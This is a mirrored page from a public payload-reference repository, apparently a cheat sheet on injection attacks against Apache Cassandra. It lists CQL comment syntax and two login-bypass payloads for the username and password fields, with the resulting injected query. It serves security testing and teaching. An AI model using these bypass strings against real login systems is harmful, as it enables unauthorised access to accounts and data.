Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-07-09 11:51:26 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
88d5af0b19
PayloadsAllTheThings/SQL injection/Cassandra Injection.md
Swissky a6475a19d9 Adding references sectio
2018-12-24 15:02:50 +01:00

794 B
Raw Blame History

Cassandra Injection

Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system

Cassandra comment

/* Cassandra Comment */

Cassandra - Login Bypass

Login Bypass 0

username: admin' ALLOW FILTERING; %00
password: ANY

Login Bypass 1

username: admin'/*
password: */and pass>'

The injection would look like the following SQL query

SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;

Example from EternalNoob : https://hack2learn.pw/cassandra/login.php

References